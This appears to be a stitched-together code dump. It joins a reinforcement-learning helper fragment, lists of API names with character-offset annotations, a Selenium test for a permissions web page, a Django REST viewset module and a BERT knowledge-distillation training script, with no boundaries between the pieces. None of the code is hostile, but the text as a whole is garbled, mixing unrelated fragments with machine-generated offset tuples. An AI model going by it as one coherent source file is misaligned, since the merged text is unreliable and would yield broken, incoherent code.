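    """Return the scalar TD target for a single transition (hypothetical helper)."""
    if done:
        return reward
    return reward + gamma * np.max(next_q_values)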
|
[
"numpy.random.uniform",
"os.makedirs",
"tensorflow.train.Saver",
"numpy.argmax",
"numpy.random.rand",
"random.sample",
"numpy.zeros",
"numpy.append",
"pysc2.agents.myAgent.myAgent_6.net.lenet.Lenet",
"tensorflow.summary.FileWriter",
"numpy.array",
"numpy.random.randint",
"tensorflow.initialize_all_variables",
"tensorflow.Summary.Value",
"tensorflow.InteractiveSession",
"numpy.max",
"numpy.squeeze",
"collections.deque"
] |
[((418, 450), 'collections.deque', 'deque', ([], {'maxlen': 'config.REPLAY_SIZE'}), '(maxlen=config.REPLAY_SIZE)\n', (423, 450), False, 'from collections import deque\n'), ((845, 959), 'pysc2.agents.myAgent.myAgent_6.net.lenet.Lenet', 'Lenet', (['self.mu', 'self.sigma', 'self.learning_rate', 'self.action_dim', 'self.parameterdim', 'self.state_dim', 'self.name'], {}), '(self.mu, self.sigma, self.learning_rate, self.action_dim, self.\n parameterdim, self.state_dim, self.name)\n', (850, 959), False, 'from pysc2.agents.myAgent.myAgent_6.net.lenet import Lenet\n'), ((1002, 1025), 'tensorflow.InteractiveSession', 'tf.InteractiveSession', ([], {}), '()\n', (1023, 1025), True, 'import tensorflow as tf\n'), ((1109, 1125), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (1123, 1125), True, 'import tensorflow as tf\n'), ((2252, 2315), 'numpy.zeros', 'np.zeros', (['(self.action_dim + self.parameterdim)'], {'dtype': 'np.float32'}), '(self.action_dim + self.parameterdim, dtype=np.float32)\n', (2260, 2315), True, 'import numpy as np\n'), ((2468, 2485), 'numpy.squeeze', 'np.squeeze', (['state'], {}), '(state)\n', (2478, 2485), True, 'import numpy as np\n'), ((2507, 2529), 'numpy.squeeze', 'np.squeeze', (['next_state'], {}), '(next_state)\n', (2517, 2529), True, 'import numpy as np\n'), ((5801, 5838), 'numpy.argmax', 'np.argmax', (['Q_value[0:self.action_dim]'], {}), '(Q_value[0:self.action_dim])\n', (5810, 5838), True, 'import numpy as np\n'), ((5859, 5929), 'numpy.array', 'np.array', (['Q_value[self.action_dim:self.action_dim + self.parameterdim]'], {}), '(Q_value[self.action_dim:self.action_dim + self.parameterdim])\n', (5867, 5929), True, 'import numpy as np\n'), ((5963, 5991), 'numpy.append', 'np.append', (['action', 'parameter'], {}), '(action, parameter)\n', (5972, 5991), True, 'import numpy as np\n'), ((1051, 1080), 'tensorflow.initialize_all_variables', 'tf.initialize_all_variables', ([], {}), '()\n', (1078, 1080), True, 'import tensorflow as tf\n'), ((1870, 1921), 'tensorflow.summary.FileWriter', 'tf.summary.FileWriter', (['thisPath', 'self.session.graph'], {}), '(thisPath, self.session.graph)\n', (1891, 1921), True, 'import tensorflow as tf\n'), ((4857, 4876), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (4874, 4876), True, 'import numpy as np\n'), ((4922, 4959), 'numpy.random.randint', 'np.random.randint', (['(0)', 'self.action_dim'], {}), '(0, self.action_dim)\n', (4939, 4959), True, 'import numpy as np\n'), ((4991, 5024), 'numpy.random.rand', 'np.random.rand', (['self.parameterdim'], {}), '(self.parameterdim)\n', (5005, 5024), True, 'import numpy as np\n'), ((5203, 5240), 'numpy.argmax', 'np.argmax', (['Q_value[0:self.action_dim]'], {}), '(Q_value[0:self.action_dim])\n', (5212, 5240), True, 'import numpy as np\n'), ((5265, 5335), 'numpy.array', 'np.array', (['Q_value[self.action_dim:self.action_dim + self.parameterdim]'], {}), '(Q_value[self.action_dim:self.action_dim + self.parameterdim])\n', (5273, 5335), True, 'import numpy as np\n'), ((1565, 1586), 'os.makedirs', 'os.makedirs', (['thisPath'], {}), '(thisPath)\n', (1576, 1586), False, 'import os\n'), ((2809, 2861), 'random.sample', 'random.sample', (['self.replay_buffer', 'config.BATCH_SIZE'], {}), '(self.replay_buffer, config.BATCH_SIZE)\n', (2822, 2861), False, 'import random\n'), ((2892, 2933), 'numpy.array', 'np.array', (['[data[0] for data in minibatch]'], {}), '([data[0] for data in minibatch])\n', (2900, 2933), True, 'import numpy as np\n'), ((2965, 3006), 'numpy.array', 'np.array', (['[data[1] for 
data in minibatch]'], {}), '([data[1] for data in minibatch])\n', (2973, 3006), True, 'import numpy as np\n'), ((3038, 3079), 'numpy.array', 'np.array', (['[data[2] for data in minibatch]'], {}), '([data[2] for data in minibatch])\n', (3046, 3079), True, 'import numpy as np\n'), ((3115, 3156), 'numpy.array', 'np.array', (['[data[3] for data in minibatch]'], {}), '([data[3] for data in minibatch])\n', (3123, 3156), True, 'import numpy as np\n'), ((3222, 3234), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (3230, 3234), True, 'import numpy as np\n'), ((1964, 2029), 'tensorflow.Summary.Value', 'tf.Summary.Value', ([], {'tag': "(self.name + '_' + 'loss')", 'simple_value': 'data'}), "(tag=self.name + '_' + 'loss', simple_value=data)\n", (1980, 2029), True, 'import tensorflow as tf\n'), ((5067, 5109), 'numpy.append', 'np.append', (['random_action', 'random_parameter'], {}), '(random_action, random_parameter)\n', (5076, 5109), True, 'import numpy as np\n'), ((5373, 5401), 'numpy.append', 'np.append', (['action', 'parameter'], {}), '(action, parameter)\n', (5382, 5401), True, 'import numpy as np\n'), ((3701, 3725), 'numpy.append', 'np.append', (['y_batch', 'temp'], {}), '(y_batch, temp)\n', (3710, 3725), True, 'import numpy as np\n'), ((4064, 4088), 'numpy.append', 'np.append', (['y_batch', 'temp'], {}), '(y_batch, temp)\n', (4073, 4088), True, 'import numpy as np\n'), ((4115, 4132), 'numpy.array', 'np.array', (['y_batch'], {}), '(y_batch)\n', (4123, 4132), True, 'import numpy as np\n'), ((3522, 3547), 'numpy.array', 'np.array', (['reward_batch[i]'], {}), '(reward_batch[i])\n', (3530, 3547), True, 'import numpy as np\n'), ((3549, 3593), 'numpy.array', 'np.array', (['Q_value_batch[i][self.action_dim:]'], {}), '(Q_value_batch[i][self.action_dim:])\n', (3557, 3593), True, 'import numpy as np\n'), ((3835, 3878), 'numpy.max', 'np.max', (['Q_value_batch[i][0:self.action_dim]'], {}), '(Q_value_batch[i][0:self.action_dim])\n', (3841, 3878), True, 'import numpy as np\n')]
|
from datetime import datetime
from time import time
from typing import TYPE_CHECKING
from grouper.constants import PERMISSION_CREATE
from grouper.entities.permission import Permission
from grouper.fe.template_util import print_date
from itests.pages.permissions import PermissionsPage
from itests.setup import frontend_server
from tests.url_util import url
if TYPE_CHECKING:
from py.path import LocalPath
from selenium.webdriver import Chrome
from tests.setup import SetupTest
from typing import List
def create_test_data(setup):
# type: (SetupTest) -> List[Permission]
"""Sets up a very basic test graph and returns the permission objects.
Be careful not to include milliseconds in the creation timestamps since this causes different
behavior on SQLite (which preserves them) and MySQL (which drops them).
"""
early_date = datetime.utcfromtimestamp(1)
now_minus_one_second = datetime.utcfromtimestamp(int(time() - 1))
now = datetime.utcfromtimestamp(int(time()))
permissions = [
Permission(name="first-permission", description="first", created_on=now_minus_one_second),
Permission(name="audited-permission", description="", created_on=now),
Permission(name="early-permission", description="is early", created_on=early_date),
]
with setup.transaction():
for permission in permissions:
setup.create_permission(
name=permission.name,
description=permission.description,
created_on=permission.created_on,
audited=(permission.name == "audited-permission"),
)
setup.create_permission("disabled", enabled=False)
setup.create_user("<EMAIL>")
return permissions
def test_list(tmpdir, setup, browser):
# type: (LocalPath, SetupTest, Chrome) -> None
permissions = create_test_data(setup)
expected_permissions = [(p.name, p.description, print_date(p.created_on)) for p in permissions]
with frontend_server(tmpdir, "<EMAIL>") as frontend_url:
browser.get(url(frontend_url, "/permissions"))
# Check the basic permission list.
page = PermissionsPage(browser)
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == sorted(expected_permissions)
assert page.heading == "Permissions"
assert page.subheading == "{} permission(s)".format(len(expected_permissions))
assert page.limit_label == "Limit: 100"
# Switch to only audited permissions.
page.click_show_audited_button()
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
audited = [p for p in expected_permissions if p[0] == "audited-permission"]
assert seen_permissions == sorted(audited)
assert page.heading == "Audited Permissions"
assert page.subheading == "{} permission(s)".format(len(audited))
# Switch back to all permissions and sort by date.
page.click_show_all_button()
page.click_sort_by_date()
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
expected_permissions_sorted_by_time = [
(p.name, p.description, print_date(p.created_on))
for p in sorted(permissions, key=lambda p: p.created_on, reverse=True)
]
assert seen_permissions == expected_permissions_sorted_by_time
# Reverse the sort order.
page.click_sort_by_date()
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == list(reversed(expected_permissions_sorted_by_time))
def test_list_pagination(tmpdir, setup, browser):
# type: (LocalPath, SetupTest, Chrome) -> None
"""Test pagination.
This forces the pagination to specific values, rather than using the page controls, since we
don't create more than 100 permissions for testing.
"""
permissions = create_test_data(setup)
expected_permissions = [(p.name, p.description, print_date(p.created_on)) for p in permissions]
with frontend_server(tmpdir, "<EMAIL>") as frontend_url:
browser.get(url(frontend_url, "/permissions?limit=1&offset=1"))
page = PermissionsPage(browser)
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == sorted(expected_permissions)[1:2]
assert page.limit_label == "Limit: 1"
# Retrieve the last permission but with a larger limit to test that the limit isn't capped
# to the number of returned items.
browser.get(url(frontend_url, "/permissions?limit=10&offset=2"))
page = PermissionsPage(browser)
seen_permissions = [(r.name, r.description, r.created_on) for r in page.permission_rows]
assert seen_permissions == sorted(expected_permissions)[2:]
assert page.limit_label == "Limit: 10"
def test_create_button(tmpdir, setup, browser):
# type: (LocalPath, SetupTest, Chrome) -> None
with setup.transaction():
setup.create_user("<EMAIL>")
with frontend_server(tmpdir, "<EMAIL>") as frontend_url:
browser.get(url(frontend_url, "/permissions"))
page = PermissionsPage(browser)
assert not page.has_create_permission_button
with setup.transaction():
setup.grant_permission_to_group(PERMISSION_CREATE, "*", "admins")
setup.add_user_to_group("<EMAIL>", "admins")
browser.get(url(frontend_url, "/permissions?refresh=yes"))
assert page.has_create_permission_button
|
[
"itests.pages.permissions.PermissionsPage",
"grouper.fe.template_util.print_date",
"time.time",
"datetime.datetime.utcfromtimestamp",
"itests.setup.frontend_server",
"tests.url_util.url",
"grouper.entities.permission.Permission"
] |
[((869, 897), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (['(1)'], {}), '(1)\n', (894, 897), False, 'from datetime import datetime\n'), ((1045, 1139), 'grouper.entities.permission.Permission', 'Permission', ([], {'name': '"""first-permission"""', 'description': '"""first"""', 'created_on': 'now_minus_one_second'}), "(name='first-permission', description='first', created_on=\n now_minus_one_second)\n", (1055, 1139), False, 'from grouper.entities.permission import Permission\n'), ((1144, 1213), 'grouper.entities.permission.Permission', 'Permission', ([], {'name': '"""audited-permission"""', 'description': '""""""', 'created_on': 'now'}), "(name='audited-permission', description='', created_on=now)\n", (1154, 1213), False, 'from grouper.entities.permission import Permission\n'), ((1223, 1310), 'grouper.entities.permission.Permission', 'Permission', ([], {'name': '"""early-permission"""', 'description': '"""is early"""', 'created_on': 'early_date'}), "(name='early-permission', description='is early', created_on=\n early_date)\n", (1233, 1310), False, 'from grouper.entities.permission import Permission\n'), ((2003, 2037), 'itests.setup.frontend_server', 'frontend_server', (['tmpdir', '"""<EMAIL>"""'], {}), "(tmpdir, '<EMAIL>')\n", (2018, 2037), False, 'from itests.setup import frontend_server\n'), ((2169, 2193), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (2184, 2193), False, 'from itests.pages.permissions import PermissionsPage\n'), ((4177, 4211), 'itests.setup.frontend_server', 'frontend_server', (['tmpdir', '"""<EMAIL>"""'], {}), "(tmpdir, '<EMAIL>')\n", (4192, 4211), False, 'from itests.setup import frontend_server\n'), ((4316, 4340), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (4331, 4340), False, 'from itests.pages.permissions import PermissionsPage\n'), ((4784, 4808), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (4799, 4808), False, 'from itests.pages.permissions import PermissionsPage\n'), ((5199, 5233), 'itests.setup.frontend_server', 'frontend_server', (['tmpdir', '"""<EMAIL>"""'], {}), "(tmpdir, '<EMAIL>')\n", (5214, 5233), False, 'from itests.setup import frontend_server\n'), ((5321, 5345), 'itests.pages.permissions.PermissionsPage', 'PermissionsPage', (['browser'], {}), '(browser)\n', (5336, 5345), False, 'from itests.pages.permissions import PermissionsPage\n'), ((1008, 1014), 'time.time', 'time', ([], {}), '()\n', (1012, 1014), False, 'from time import time\n'), ((1945, 1969), 'grouper.fe.template_util.print_date', 'print_date', (['p.created_on'], {}), '(p.created_on)\n', (1955, 1969), False, 'from grouper.fe.template_util import print_date\n'), ((2075, 2108), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions"""'], {}), "(frontend_url, '/permissions')\n", (2078, 2108), False, 'from tests.url_util import url\n'), ((4120, 4144), 'grouper.fe.template_util.print_date', 'print_date', (['p.created_on'], {}), '(p.created_on)\n', (4130, 4144), False, 'from grouper.fe.template_util import print_date\n'), ((4249, 4299), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions?limit=1&offset=1"""'], {}), "(frontend_url, '/permissions?limit=1&offset=1')\n", (4252, 4299), False, 'from tests.url_util import url\n'), ((4716, 4767), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions?limit=10&offset=2"""'], {}), "(frontend_url, '/permissions?limit=10&offset=2')\n", (4719, 4767), 
False, 'from tests.url_util import url\n'), ((5271, 5304), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions"""'], {}), "(frontend_url, '/permissions')\n", (5274, 5304), False, 'from tests.url_util import url\n'), ((5589, 5634), 'tests.url_util.url', 'url', (['frontend_url', '"""/permissions?refresh=yes"""'], {}), "(frontend_url, '/permissions?refresh=yes')\n", (5592, 5634), False, 'from tests.url_util import url\n'), ((955, 961), 'time.time', 'time', ([], {}), '()\n', (959, 961), False, 'from time import time\n'), ((3294, 3318), 'grouper.fe.template_util.print_date', 'print_date', (['p.created_on'], {}), '(p.created_on)\n', (3304, 3318), False, 'from grouper.fe.template_util import print_date\n')]
|
import os
from django.shortcuts import render
from django.conf import settings
from django.http import HttpResponse
from . import database
from .models import PageView
from rest_framework.viewsets import GenericViewSet
from rest_framework.mixins import (RetrieveModelMixin, CreateModelMixin, ListModelMixin, DestroyModelMixin, UpdateModelMixin)
from primesession.serializer import Session,SessionSerializer
def index(request):
hostname = os.getenv('HOSTNAME', 'unknown')
PageView.objects.create(hostname=hostname)
return render(request, 'primesession/index.html', {
'hostname': hostname,
'database': database.info(),
'count': PageView.objects.count()
})
def health(request):
return HttpResponse(PageView.objects.count())
class SessionViewSet(RetrieveModelMixin, CreateModelMixin, ListModelMixin,DestroyModelMixin,UpdateModelMixin, GenericViewSet):
queryset = Session.objects.all()
serializer_class = SessionSerializer
lookup_field = 'sessionid'
class TokenViewSet(RetrieveModelMixin, CreateModelMixin, ListModelMixin,DestroyModelMixin,UpdateModelMixin, GenericViewSet):
queryset = Session.objects.all()
serializer_class = SessionSerializer
lookup_field = 'token'
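
# Illustrative wiring (an assumption, not part of this module): DRF viewsets like these are
# typically exposed through a router in urls.py, e.g.
#     from rest_framework.routers import DefaultRouter
#     router = DefaultRouter()
#     router.register(r'sessions', SessionViewSet)
#     router.register(r'tokens', TokenViewSet)
#     urlpatterns = router.urls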
|
[
"primesession.serializer.Session.objects.all",
"os.getenv"
] |
[((465, 497), 'os.getenv', 'os.getenv', (['"""HOSTNAME"""', '"""unknown"""'], {}), "('HOSTNAME', 'unknown')\n", (474, 497), False, 'import os\n'), ((934, 955), 'primesession.serializer.Session.objects.all', 'Session.objects.all', ([], {}), '()\n', (953, 955), False, 'from primesession.serializer import Session, SessionSerializer\n'), ((1170, 1191), 'primesession.serializer.Session.objects.all', 'Session.objects.all', ([], {}), '()\n', (1189, 1191), False, 'from primesession.serializer import Session, SessionSerializer\n')]
|
import logging
logging.basicConfig(
format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt='%Y/%m/%d %H:%M:%S',
level=logging.INFO,
)
logger = logging.getLogger("Main")
import os,random
import numpy as np
import torch
from utils_glue import output_modes, processors
from pytorch_pretrained_bert.my_modeling import BertConfig
from pytorch_pretrained_bert import BertTokenizer
from optimization import BERTAdam
import config
from utils import divide_parameters, load_and_cache_examples
from modeling import BertForGLUESimple,BertForGLUESimpleAdaptor
from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler
from tqdm import tqdm
from utils_glue import compute_metrics
from functools import partial
def args_check(args):
if os.path.exists(args.output_dir) and os.listdir(args.output_dir):
logger.warning("Output directory () already exists and is not empty.")
if args.gradient_accumulation_steps < 1:
raise ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(
args.gradient_accumulation_steps))
if not args.do_train and not args.do_predict:
raise ValueError("At least one of `do_train` or `do_predict` must be True.")
if args.local_rank == -1 or args.no_cuda:
device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
n_gpu = torch.cuda.device_count() if not args.no_cuda else 0
else:
device = torch.device("cuda", args.local_rank)
n_gpu = 1
torch.distributed.init_process_group(backend='nccl')
logger.info("device %s n_gpu %d distributed training %r", device, n_gpu, bool(args.local_rank != -1))
args.n_gpu = n_gpu
args.device = device
return device, n_gpu
def predict(model,eval_datasets,step,args):
eval_task_names = ("mnli", "mnli-mm") if args.task_name == "mnli" else (args.task_name,)
eval_output_dir = args.output_dir
results = {}
for eval_task,eval_dataset in zip(eval_task_names, eval_datasets):
if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:
os.makedirs(eval_output_dir)
logger.info("Predicting...")
logger.info("***** Running predictions *****")
logger.info(" task name = %s", eval_task)
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.predict_batch_size)
eval_sampler = SequentialSampler(eval_dataset) if args.local_rank == -1 else DistributedSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.predict_batch_size)
model.eval()
pred_logits = []
label_ids = []
for batch in tqdm(eval_dataloader, desc="Evaluating", disable=None):
input_ids, input_mask, segment_ids, labels = batch
input_ids = input_ids.to(args.device)
input_mask = input_mask.to(args.device)
segment_ids = segment_ids.to(args.device)
with torch.no_grad():
logits = model(input_ids, input_mask, segment_ids)
cpu_logits = logits.detach().cpu()
for i in range(len(cpu_logits)):
pred_logits.append(cpu_logits[i].numpy())
label_ids.append(labels[i])
pred_logits = np.array(pred_logits)
label_ids = np.array(label_ids)
if args.output_mode == "classification":
preds = np.argmax(pred_logits, axis=1)
else: # args.output_mode == "regression":
preds = np.squeeze(pred_logits)
result = compute_metrics(eval_task, preds, label_ids)
logger.info(f"task:,{eval_task}")
logger.info(f"result: {result}")
results.update(result)
output_eval_file = os.path.join(eval_output_dir, "eval_results-%s.txt" % eval_task)
with open(output_eval_file, "a") as writer:
logger.info("***** Eval results {} task {} *****".format(step, eval_task))
writer.write("step: %d ****\n " % step)
for key in sorted(results.keys()):
logger.info("%s = %s", key, str(results[key]))
writer.write("%s = %s\n" % (key, str(results[key])))
model.train()
return results
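
# Illustrative sketch (not textbrewer's internal code): with kd_loss_type='ce' and a
# temperature T, the distillation loss configured in main() is conceptually the soft
# cross entropy between temperature-scaled teacher and student distributions. All names
# below are local stand-ins.
def _kd_ce_loss_sketch(logits_S, logits_T, temperature=1.0):
    """Soft cross-entropy between student and teacher logits (hypothetical helper)."""
    p_T = torch.softmax(logits_T / temperature, dim=-1)        # softened teacher probabilities
    log_p_S = torch.log_softmax(logits_S / temperature, dim=-1)  # softened student log-probs
    return -(p_T * log_p_S).sum(dim=-1).mean()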
def main():
#parse arguments
config.parse()
args = config.args
for k,v in vars(args).items():
logger.info(f"{k}:{v}")
#set seeds
torch.manual_seed(args.random_seed)
torch.cuda.manual_seed_all(args.random_seed)
np.random.seed(args.random_seed)
random.seed(args.random_seed)
#arguments check
device, n_gpu = args_check(args)
os.makedirs(args.output_dir, exist_ok=True)
forward_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps)
args.forward_batch_size = forward_batch_size
#load bert config
bert_config_T = BertConfig.from_json_file(args.bert_config_file_T)
bert_config_S = BertConfig.from_json_file(args.bert_config_file_S)
assert args.max_seq_length <= bert_config_T.max_position_embeddings
assert args.max_seq_length <= bert_config_S.max_position_embeddings
#Prepare GLUE task
processor = processors[args.task_name]()
args.output_mode = output_modes[args.task_name]
label_list = processor.get_labels()
num_labels = len(label_list)
#read data
train_dataset = None
eval_datasets = None
num_train_steps = None
tokenizer = BertTokenizer(vocab_file=args.vocab_file, do_lower_case=args.do_lower_case)
if args.do_train:
train_dataset = load_and_cache_examples(args, args.task_name, tokenizer, evaluate=False)
if args.aux_task_name:
aux_train_dataset = load_and_cache_examples(args, args.aux_task_name, tokenizer, evaluate=False, is_aux=True)
train_dataset = torch.utils.data.ConcatDataset([train_dataset, aux_train_dataset])
num_train_steps = int(len(train_dataset)/args.train_batch_size) * args.num_train_epochs
if args.do_predict:
eval_datasets = []
eval_task_names = ("mnli", "mnli-mm") if args.task_name == "mnli" else (args.task_name,)
for eval_task in eval_task_names:
eval_datasets.append(load_and_cache_examples(args, eval_task, tokenizer, evaluate=True))
logger.info("Data loaded")
#Build Model and load checkpoint
model_S = BertForGLUESimple(bert_config_S, num_labels=num_labels,args=args)
#Load teacher
if args.tuned_checkpoint_Ts:
model_Ts = [BertForGLUESimple(bert_config_T, num_labels=num_labels,args=args) for i in range(len(args.tuned_checkpoint_Ts))]
for model_T, ckpt_T in zip(model_Ts,args.tuned_checkpoint_Ts):
logger.info("Load state dict %s" % ckpt_T)
state_dict_T = torch.load(ckpt_T, map_location='cpu')
model_T.load_state_dict(state_dict_T)
model_T.eval()
else:
assert args.do_predict is True
#Load student
if args.load_model_type=='bert':
assert args.init_checkpoint_S is not None
state_dict_S = torch.load(args.init_checkpoint_S, map_location='cpu')
state_weight = {k[5:]:v for k,v in state_dict_S.items() if k.startswith('bert.')}
missing_keys,_ = model_S.bert.load_state_dict(state_weight,strict=False)
assert len(missing_keys)==0
elif args.load_model_type=='all':
assert args.tuned_checkpoint_S is not None
state_dict_S = torch.load(args.tuned_checkpoint_S,map_location='cpu')
model_S.load_state_dict(state_dict_S)
else:
logger.info("Model is randomly initialized.")
if args.do_train:
for model_T in model_Ts:
model_T.to(device)
model_S.to(device)
if args.local_rank != -1 or n_gpu > 1:
if args.local_rank != -1:
raise NotImplementedError
elif n_gpu > 1:
if args.do_train:
model_Ts = [torch.nn.DataParallel(model_T) for model_T in model_Ts]
model_S = torch.nn.DataParallel(model_S) #,output_device=n_gpu-1)
if args.do_train:
#parameters
params = list(model_S.named_parameters())
all_trainable_params = divide_parameters(params, lr=args.learning_rate)
logger.info("Length of all_trainable_params: %d", len(all_trainable_params))
optimizer = BERTAdam(all_trainable_params,lr=args.learning_rate,
warmup=args.warmup_proportion,t_total=num_train_steps,schedule=args.schedule,
s_opt1=args.s_opt1, s_opt2=args.s_opt2, s_opt3=args.s_opt3)
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Forward batch size = %d", forward_batch_size)
logger.info(" Num backward steps = %d", num_train_steps)
########### DISTILLATION ###########
train_config = TrainingConfig(
gradient_accumulation_steps = args.gradient_accumulation_steps,
ckpt_frequency = args.ckpt_frequency,
log_dir = args.output_dir,
output_dir = args.output_dir,
device = args.device)
distill_config = DistillationConfig(
temperature = args.temperature,
kd_loss_type = 'ce')
logger.info(f"{train_config}")
logger.info(f"{distill_config}")
adaptor = partial(BertForGLUESimpleAdaptor, no_logits=False, no_mask = False)
distiller = MultiTeacherDistiller(train_config = train_config,
distill_config = distill_config,
model_T = model_Ts, model_S = model_S,
adaptor_T=adaptor,
adaptor_S=adaptor)
if args.local_rank == -1:
train_sampler = RandomSampler(train_dataset)
else:
raise NotImplementedError
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.forward_batch_size,drop_last=True)
callback_func = partial(predict, eval_datasets=eval_datasets, args=args)
with distiller:
distiller.train(optimizer, scheduler=None, dataloader=train_dataloader,
num_epochs=args.num_train_epochs, callback=callback_func)
if not args.do_train and args.do_predict:
res = predict(model_S,eval_datasets,step=0,args=args)
print (res)
if __name__ == "__main__":
main()
|
[
"numpy.random.seed",
"torch.utils.data.RandomSampler",
"numpy.argmax",
"pytorch_pretrained_bert.BertTokenizer",
"textbrewer.MultiTeacherDistiller",
"torch.cuda.device_count",
"config.parse",
"pytorch_pretrained_bert.my_modeling.BertConfig.from_json_file",
"torch.device",
"modeling.BertForGLUESimple",
"utils_glue.compute_metrics",
"os.path.join",
"torch.no_grad",
"torch.utils.data.DataLoader",
"textbrewer.TrainingConfig",
"torch.load",
"os.path.exists",
"utils.load_and_cache_examples",
"random.seed",
"torch.utils.data.SequentialSampler",
"functools.partial",
"tqdm.tqdm",
"torch.utils.data.ConcatDataset",
"torch.manual_seed",
"torch.cuda.is_available",
"numpy.squeeze",
"os.listdir",
"torch.distributed.init_process_group",
"os.makedirs",
"logging.basicConfig",
"textbrewer.DistillationConfig",
"torch.utils.data.DistributedSampler",
"torch.cuda.manual_seed_all",
"numpy.array",
"optimization.BERTAdam",
"torch.nn.DataParallel",
"logging.getLogger",
"utils.divide_parameters"
] |
[((15, 157), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)s - %(levelname)s - %(name)s - %(message)s"""', 'datefmt': '"""%Y/%m/%d %H:%M:%S"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt=\n '%Y/%m/%d %H:%M:%S', level=logging.INFO)\n", (34, 157), False, 'import logging\n'), ((176, 201), 'logging.getLogger', 'logging.getLogger', (['"""Main"""'], {}), "('Main')\n", (193, 201), False, 'import logging\n'), ((3946, 4010), 'os.path.join', 'os.path.join', (['eval_output_dir', "('eval_results-%s.txt' % eval_task)"], {}), "(eval_output_dir, 'eval_results-%s.txt' % eval_task)\n", (3958, 4010), False, 'import os, random\n'), ((4432, 4446), 'config.parse', 'config.parse', ([], {}), '()\n', (4444, 4446), False, 'import config\n'), ((4556, 4591), 'torch.manual_seed', 'torch.manual_seed', (['args.random_seed'], {}), '(args.random_seed)\n', (4573, 4591), False, 'import torch\n'), ((4596, 4640), 'torch.cuda.manual_seed_all', 'torch.cuda.manual_seed_all', (['args.random_seed'], {}), '(args.random_seed)\n', (4622, 4640), False, 'import torch\n'), ((4645, 4677), 'numpy.random.seed', 'np.random.seed', (['args.random_seed'], {}), '(args.random_seed)\n', (4659, 4677), True, 'import numpy as np\n'), ((4682, 4711), 'random.seed', 'random.seed', (['args.random_seed'], {}), '(args.random_seed)\n', (4693, 4711), False, 'import os, random\n'), ((4775, 4818), 'os.makedirs', 'os.makedirs', (['args.output_dir'], {'exist_ok': '(True)'}), '(args.output_dir, exist_ok=True)\n', (4786, 4818), False, 'import os, random\n'), ((4998, 5048), 'pytorch_pretrained_bert.my_modeling.BertConfig.from_json_file', 'BertConfig.from_json_file', (['args.bert_config_file_T'], {}), '(args.bert_config_file_T)\n', (5023, 5048), False, 'from pytorch_pretrained_bert.my_modeling import BertConfig\n'), ((5069, 5119), 'pytorch_pretrained_bert.my_modeling.BertConfig.from_json_file', 'BertConfig.from_json_file', (['args.bert_config_file_S'], {}), '(args.bert_config_file_S)\n', (5094, 5119), False, 'from pytorch_pretrained_bert.my_modeling import BertConfig\n'), ((5568, 5643), 'pytorch_pretrained_bert.BertTokenizer', 'BertTokenizer', ([], {'vocab_file': 'args.vocab_file', 'do_lower_case': 'args.do_lower_case'}), '(vocab_file=args.vocab_file, do_lower_case=args.do_lower_case)\n', (5581, 5643), False, 'from pytorch_pretrained_bert import BertTokenizer\n'), ((6483, 6549), 'modeling.BertForGLUESimple', 'BertForGLUESimple', (['bert_config_S'], {'num_labels': 'num_labels', 'args': 'args'}), '(bert_config_S, num_labels=num_labels, args=args)\n', (6500, 6549), False, 'from modeling import BertForGLUESimple, BertForGLUESimpleAdaptor\n'), ((895, 926), 'os.path.exists', 'os.path.exists', (['args.output_dir'], {}), '(args.output_dir)\n', (909, 926), False, 'import os, random\n'), ((931, 958), 'os.listdir', 'os.listdir', (['args.output_dir'], {}), '(args.output_dir)\n', (941, 958), False, 'import os, random\n'), ((1625, 1662), 'torch.device', 'torch.device', (['"""cuda"""', 'args.local_rank'], {}), "('cuda', args.local_rank)\n", (1637, 1662), False, 'import torch\n'), ((1689, 1741), 'torch.distributed.init_process_group', 'torch.distributed.init_process_group', ([], {'backend': '"""nccl"""'}), "(backend='nccl')\n", (1725, 1741), False, 'import torch\n'), ((2720, 2807), 'torch.utils.data.DataLoader', 'DataLoader', (['eval_dataset'], {'sampler': 'eval_sampler', 'batch_size': 'args.predict_batch_size'}), '(eval_dataset, sampler=eval_sampler, batch_size=args.\n 
